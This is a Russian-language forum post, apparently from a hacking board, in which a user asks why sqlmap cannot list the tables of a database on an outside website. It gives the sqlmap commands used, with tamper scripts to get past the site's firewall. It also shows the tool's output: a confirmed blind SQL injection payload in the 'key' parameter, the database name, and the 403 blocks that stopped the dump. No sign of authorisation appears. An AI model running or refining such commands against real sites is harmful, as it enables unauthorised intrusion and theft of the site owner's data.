Показать сообщение отдельно

  #992  
Старый 06.02.2020, 11:28
hashfinderboss
Новичок
Регистрация: 31.01.2020
Сообщений: 11
Провел на форуме:
2992

Репутация: 0
По умолчанию

Люди добрые ,подскажите ввожу

sqlmap -u "https://www.domen.mx/top/?key=xol" --random-agent --tamper=space2comment --risk=3 --level=1 --threads=10 --dbs

получаю, имя бд

available databases [1]:
[*] bd_upgrade_live

далее ввожу

sqlmap -u "https://www.domen.mx/top/?key=xol" --random-agent --tamper=space2comment --threads=10 -D suplemen_upgrade_live -tables

таблица не выводит,пишет

[08:12:55] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS

sqlmap resumed the following injection point(s) from stored session:

---

Parameter: key (GET)

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: key=xol' AND 3094=3094 AND 'NPlU'='NPlU

---

[08:12:55] [WARNING] changes made by tampering scripts are not included in shown payload content(s)

[08:12:55] [INFO] the back-end DBMS is MySQL

back-end DBMS: MySQL 5

[08:12:55] [INFO] fetching tables for database: 'suplemen_upgrade_live'

[08:12:55] [INFO] fetching number of tables for database 'suplemen_upgrade_live'

[08:13:01] [INFO] retrieved:

[08:13:02] [WARNING] unexpected HTTP code '403' detected. Will use (extra) validation step in similar cases

[08:13:03] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'

[08:13:03] [WARNING] unable to retrieve the number of tables for database 'bd_upgrade_live'

[08:13:03] [ERROR] unable to retrieve the table names for any database

do you want to use common table existence check? [y/N/q] n

No tables found

[08:14:27] [WARNING] HTTP error codes detected during run:

403 (Forbidden) - 3 times

[08:14:27] [INFO] fetched data logged to text files under '/home/win/.sqlmap/output/www.domen.mx'
[*] ending @ 08:14:27 /2020-02-06/

Обьясните пожалуйста почему так?
 
Ответить с цитированием